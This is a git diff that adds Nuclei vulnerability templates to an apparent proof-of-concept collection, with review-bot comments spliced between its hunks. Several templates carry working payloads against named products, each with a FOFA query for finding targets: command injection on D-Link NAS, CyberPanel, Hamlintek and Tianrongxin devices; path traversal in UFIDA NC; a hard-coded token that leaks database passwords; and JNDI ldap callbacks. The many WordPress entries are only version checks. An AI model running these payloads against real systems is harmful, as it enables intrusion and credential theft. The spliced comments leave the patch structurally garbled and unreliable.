+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: body="用友BIP" && body="数据应用服务"
+
+http:
+ - raw:
+ - |
+ GET /bi/api/SemanticModel/GetOlapConnectionList/?token=e30fe47a-f33e-463e-bc4a-843957ca88dd_263720ea7e397482da220115cae828_1214162142339 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"Password","DatabaseName")
\ No newline at end of file
diff --git a/poc/other/yonyou-UFIDA-NC-download-fileread.yaml b/poc/other/yonyou-UFIDA-NC-download-fileread.yaml
new file mode 100644
index 0000000000..7d6959560f
--- /dev/null
+++ b/poc/other/yonyou-UFIDA-NC-download-fileread.yaml
@@ -0,0 +1,19 @@
+id: yonyou-UFIDA-NC-download-fileread
+
+info:
+ name: yonyou-UFIDA-NC-download-fileread
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: app="用友-UFIDA-NC"
+
+http:
+ - raw:
+ - |+
+ GET /portal/pt/downCourseWare/download?fileName=../webapps/nc_web/WEB-INF/web.xml&pageId=login HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"Password","DatabaseName")
diff --git a/poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml b/poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml
new file mode 100644
index 0000000000..25e0c70b40
--- /dev/null
+++ b/poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml
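Review bot: The request line of the yongyou-BIP template hard-codes a long `token=` value with nothing in the file saying where it comes from. If it is a static value shipped with the product, that is the finding and should be stated in a `description:`; if it was captured from a live system, it should not be committed. I would add a comment above the request such as `# token: <origin of this value: product default or captured session>` and a `reference:` entry. Because the matcher keys on `Password` and `DatabaseName` in the body, a positive response holds connection secrets, so scan output that stores response bodies needs to be handled as sensitive.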
@@ -0,0 +1,25 @@
+id: D-Link_DNS-320-account_mgr-rce
+
+info:
+ name: D-Link_DNS-320-account_mgr-rce
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="D_Link-DNS-ShareCenter"
+variables:
+ flag: "{{to_lower(rand_base(6))}}"
+requests:
+ - raw:
+ - |+
+ GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{flag}};%27 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{flag}}"
+ - type: status
+ status:
+ - 200
diff --git a/poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml b/poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml
new file mode 100644
index 0000000000..8af342dcea
--- /dev/null
+++ b/poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml
@@ -0,0 +1,25 @@
+id: D-Link_DNS-320-scan_dsk-rce
+
+info:
+ name: D-Link_DNS-320-scan_dsk-rce
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="D_Link-DNS-ShareCenter"
+variables:
+ flag: "{{to_lower(rand_base(6))}}"
+requests:
+ - raw:
+ - |+
+ GET /cgi-bin/scan_dsk.cgi?cmd=ScanDisk_run_e2fsck&f_dev=a;echo%20{{flag}}; HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{flag}}"
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/remote_code_execution/ar-for-woocommerce.yaml b/poc/remote_code_execution/ar-for-woocommerce.yaml
new file mode 100644
index 0000000000..dcb60f9bf7
--- /dev/null
+++ b/poc/remote_code_execution/ar-for-woocommerce.yaml
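Review bot: Both D-Link templates send `{{flag}}` verbatim in the query string and then match the same string in the body, so any device or proxy that reflects the request parameter in a 200 page is reported as critical even though nothing was executed. The matcher set needs a condition that separates reflection from output, for example a negative word matcher that fails when the body also carries the `echo` keyword from the request; this should be checked against a real device response before merging. The tianrongxin-yunweishenji-synRequest template later in this patch has the same weakness with its fixed marker `87261823612`.

```yaml
    matchers-condition: and
    matchers:
      # … unchanged: word matcher on {{flag}}, status 200 …
      - type: word
        part: body
        words:
          - "echo"
        negative: true
```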
@@ -0,0 +1,59 @@ +id: ar-for-woocommerce-c4de0b2f08459711f843283164b2de85 + +info: + name: > + AR For Woocommerce <= 6.2 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/48950965-f7da-42af-9f9a-4bf7fd33be45?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ar-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/ar-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ar-for-woocommerce,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ar-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ar-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2') \ No newline at end of file diff --git a/poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml b/poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml new file mode 100644 index 0000000000..9527fa8bbe --- /dev/null +++ b/poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml 
@@ -0,0 +1,24 @@
+id: cyberpanel-upgrademysqlstatus-rce
+
+info:
+ name: cyberpanel-upgrademysqlstatus-rce
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="CyberPanel"
+
+http:
+ - raw:
+ - |
+ GET /dataBases/upgrademysqlstatus HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
+ Content-Type: application/json
+ Connection: close
+
+ {"statusfile":"1;id;#"}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"uid=") && contains_all(body,"gid=")
\ No newline at end of file
diff --git a/poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml b/poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml
new file mode 100644
index 0000000000..0e182a7703
--- /dev/null
+++ b/poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml
@@ -0,0 +1,59 @@ +id: geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f + +info: + name: > + GeoDataSource Country Region DropDown <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c974726e-9371-40e5-8664-c12c8c06e5b9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/geodatasource-country-region-dropdown/" + google-query: inurl:"/wp-content/plugins/geodatasource-country-region-dropdown/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,geodatasource-country-region-dropdown,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/geodatasource-country-region-dropdown/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "geodatasource-country-region-dropdown" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml b/poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml new file mode 100644 index 0000000000..1abd80a6f3 --- /dev/null +++ b/poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml 
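Review bot: This template is a low-severity stored-XSS version check, yet it is added under `poc/remote_code_execution/`. Anyone who selects templates by directory, or reads the path in a report, will treat the hit as code execution. The same misfiling affects min-and-max-quantity-for-woocommerce (Missing Authorization), ni-woocommerce-order-export and woocommerce-myparcel (reflected XSS), prodigy-commerce (stored XSS) and webd-woocommerce-product-excel-importer-bulk-edit (XXE). What these names share is the substring `rce` inside `source` and `commerce`, so the sorter presumably matches on the file name; that is an inference from the paths, not something the patch shows. Categorise from the `name:` or `tags:` field instead, or match `rce` only as a whole token.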
@@ -0,0 +1,22 @@
+id: hamlintek-ISS-7000-login_handler-rce
+
+info:
+ name: hamlintek-ISS-7000-login_handler-rce
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: body="css/login_form_style-06.css"
+
+http:
+ - raw:
+ - |
+ POST /login_handler.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username=admin&password=admin;id;&uilng=3&button=%E7%99%BB%E5%85%A5&Signin=
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"uid=0") && contains_all(body,"gid=0") && contains_all(header,"ISS-7000 v2")
diff --git a/poc/remote_code_execution/kingdee_eas_apputil_rce.yaml b/poc/remote_code_execution/kingdee_eas_apputil_rce.yaml
new file mode 100644
index 0000000000..4939fbb5c3
--- /dev/null
+++ b/poc/remote_code_execution/kingdee_eas_apputil_rce.yaml
@@ -0,0 +1,20 @@
+id: kingdee_eas_apputil_rce
+
+info:
+ name: kingdee_eas_apputil_rce
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="/eassso/common/js"
+
+http:
+ - raw:
+ - |+
+ GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22{{interactsh-url}}%22%7D%7D HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
diff --git a/poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml b/poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml
new file mode 100644
index 0000000000..d9b18fc48f
--- /dev/null
+++ b/poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml
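Review bot: In the kingdee_eas_apputil_rce hunk the only matcher is a `dns` interaction on `interactsh_protocol`. That shows the server resolved a hostname supplied in the request; it does not show that code ran, although the id and name both say `rce`. I would add a `description:` stating that the template confirms an out-of-band DNS lookup only and that the result needs manual confirmation, so the finding is not triaged as proven execution. The meite-crm-sync_emp_weixin-rce template that follows in this patch matches on the same single `dns` signal and is rated `critical`; it needs the same caveat.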
@@ -0,0 +1,19 @@
+id: meite-crm-sync_emp_weixin-rce
+
+info:
+ name: meite-crm-sync_emp_weixin-rce
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: body="/common/newlay/image/metacrm7_logo.png"
+http:
+ - raw:
+ - |
+ GET /weixin/admin/sync_emp_weixin.jsp?emp_json=[{%22@type%22:%22[com.sun.rowset.JdbcRowSetImpl%22[{,%22dataSourceName%22:%22ldap://{{interactsh-url}}%22,%22autoCommit%22:true}] HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
\ No newline at end of file
diff --git a/poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml b/poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml
new file mode 100644
index 0000000000..b72218da7c
--- /dev/null
+++ b/poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml
@@ -0,0 +1,59 @@ +id: min-and-max-quantity-for-woocommerce-0f5a6c102396442ad361086f6c37c680 + +info: + name: > + Minimum and Maximum Quantity for WooCommerce <= 2.0.0 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22738841-b25c-4519-9b94-e64a3fdf6cea?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/min-and-max-quantity-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/min-and-max-quantity-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,min-and-max-quantity-for-woocommerce,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/min-and-max-quantity-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "min-and-max-quantity-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/remote_code_execution/ni-woocommerce-order-export.yaml b/poc/remote_code_execution/ni-woocommerce-order-export.yaml new file mode 100644 index 0000000000..42447ce6d5 --- /dev/null +++ b/poc/remote_code_execution/ni-woocommerce-order-export.yaml 
@@ -0,0 +1,59 @@ +id: ni-woocommerce-order-export-bc1c0fd81e2a3ec59a3d7bcd78b83be3 + +info: + name: > + Ni WooCommerce Order Export <= 3.1.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/36510335-df4c-473d-8091-ba7e070525bf?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ni-woocommerce-order-export/" + google-query: inurl:"/wp-content/plugins/ni-woocommerce-order-export/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ni-woocommerce-order-export,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ni-woocommerce-order-export/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ni-woocommerce-order-export" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.6') \ No newline at end of file diff --git a/poc/remote_code_execution/prodigy-commerce.yaml b/poc/remote_code_execution/prodigy-commerce.yaml new file mode 100644 index 0000000000..7e395c5af4 --- /dev/null +++ b/poc/remote_code_execution/prodigy-commerce.yaml 
@@ -0,0 +1,59 @@ +id: prodigy-commerce-89dae14b2ed2d25b5a5c7aae20575f1c + +info: + name: > + Prodigy Commerce <= 3.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14b10f8e-37dd-4a34-87da-c09fdb8e09b3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/prodigy-commerce/" + google-query: inurl:"/wp-content/plugins/prodigy-commerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,prodigy-commerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/prodigy-commerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "prodigy-commerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.8') \ No newline at end of file diff --git a/poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml b/poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml new file mode 100644 index 0000000000..55dcf77504 --- /dev/null +++ b/poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml 
@@ -0,0 +1,33 @@
+id: tianrongxin-yunweishenji-synRequest-rce
+
+info:
+ name: tianrongxin-yunweishenji-synRequest-rce
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: header="iam" && server="Apache-Coyote/"
+
+requests:
+ - raw:
+ - |-
+ POST /iam/synRequest.do;.login.jsp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 62
+ Accept: application/json, text/javascript, */*; q=0.01
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+ Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9
+ Connection: close
+
+ method=trace_route&w=1&ip=127.0.0.1|echo%2087261823612%3b&m=10
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '87261823612'
+ - type: status
+ status:
+ - 200
diff --git a/poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml b/poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml
new file mode 100644
index 0000000000..60a2a811ad
--- /dev/null
+++ b/poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml
@@ -0,0 +1,59 @@ +id: webd-woocommerce-product-excel-importer-bulk-edit-ca4c619b208bcba2a3262a03cfacdba5 + +info: + name: > + PHPSpreadsheet Library < 2.3.0 - XXE Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/" + google-query: inurl:"/wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,webd-woocommerce-product-excel-importer-bulk-edit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "webd-woocommerce-product-excel-importer-bulk-edit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.6') \ No newline at end of file diff --git a/poc/remote_code_execution/woocommerce-myparcel.yaml b/poc/remote_code_execution/woocommerce-myparcel.yaml new file mode 100644 index 0000000000..7b8cb962d0 --- /dev/null +++ b/poc/remote_code_execution/woocommerce-myparcel.yaml 
@@ -0,0 +1,59 @@ +id: woocommerce-myparcel-19ad14ddf207ea295ff49c75f6ba3023 + +info: + name: > + MyParcel <= 4.24.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6c85f2b-965d-477f-9d9a-4a3f315c4904?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce-myparcel/" + google-query: inurl:"/wp-content/plugins/woocommerce-myparcel/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce-myparcel,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-myparcel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-myparcel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.24.1') \ No newline at end of file diff --git a/poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml b/poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml new file mode 100644 index 0000000000..f5efadf10d --- /dev/null +++ b/poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml 
@@ -0,0 +1,59 @@ +id: my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79 + +info: + name: > + My IDX Home Search <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/my-idx-home-search/" + google-query: inurl:"/wp-content/plugins/my-idx-home-search/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,my-idx-home-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "my-idx-home-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml b/poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml new file mode 100644 index 0000000000..3a0aafa573 --- /dev/null +++ b/poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml 
@@ -0,0 +1,59 @@
+id: my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b
+
+info:
+ name: >
+ My IDX Home Search <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/my-idx-home-search/"
+ google-query: inurl:"/wp-content/plugins/my-idx-home-search/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,my-idx-home-search,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "my-idx-home-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.1')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml b/poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml
new file mode 100644
index 0000000000..40163d028a
--- /dev/null
+++ b/poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11095-b0165142a699db32c27db406fb189dac
+
+info:
+ name: >
+ Visualmodo Elements <= 1.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Visualmodo Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11095
+ metadata:
+ fofa-query: "wp-content/plugins/visualmodo-elements/"
+ google-query: inurl:"/wp-content/plugins/visualmodo-elements/"
+ shodan-query: 'vuln:CVE-2024-11095'
+ tags: cve,wordpress,wp-plugin,visualmodo-elements,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/visualmodo-elements/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "visualmodo-elements"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml b/poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml
new file mode 100644
index 0000000000..74cd0f9c53
--- /dev/null
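Review bot: `severity: low` and the trailing `low` tag in `CVE-2024-11095-b0165142a699db32c27db406fb189dac` disagree with the `cvss-score: 6.4` recorded in the same `info` block; 6.4 is in the CVSS v3.1 Medium band, so results sorted or filtered by severity will under-rank the finding. I would set `severity: medium` and end the tag list with `medium`, or, if the downgrade is deliberate because the check is version-only, say so in a comment next to `severity`. The same mismatch is in CVE-2024-11855, CVE-2024-11867, CVE-2024-11869 and CVE-2024-11883 (all 6.4), and CVE-2024-9698 carries `cvss-score: 7.2` with `severity: low`. These files are also added under `poc/sql/` although their names describe stored XSS and a file upload, which will mislead anyone selecting templates by directory.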
+++ b/poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d
+
+info:
+ name: >
+ Koalendar – Events & Appointments Booking Calendar <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via height Parameter
+ author: topscoder
+ severity: low
+ description: >
+ The Koalendar – Events & Appointments Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘height’ parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11855
+ metadata:
+ fofa-query: "wp-content/plugins/koalendar-free-booking-widget/"
+ google-query: inurl:"/wp-content/plugins/koalendar-free-booking-widget/"
+ shodan-query: 'vuln:CVE-2024-11855'
+ tags: cve,wordpress,wp-plugin,koalendar-free-booking-widget,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/koalendar-free-booking-widget/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "koalendar-free-booking-widget"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml b/poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml
new file mode 100644
index 0000000000..938460803e
--- /dev/null
+++ b/poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53
+
+info:
+ name: >
+ Companion Portfolio – Responsive Portfolio Plugin <= 2.4.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
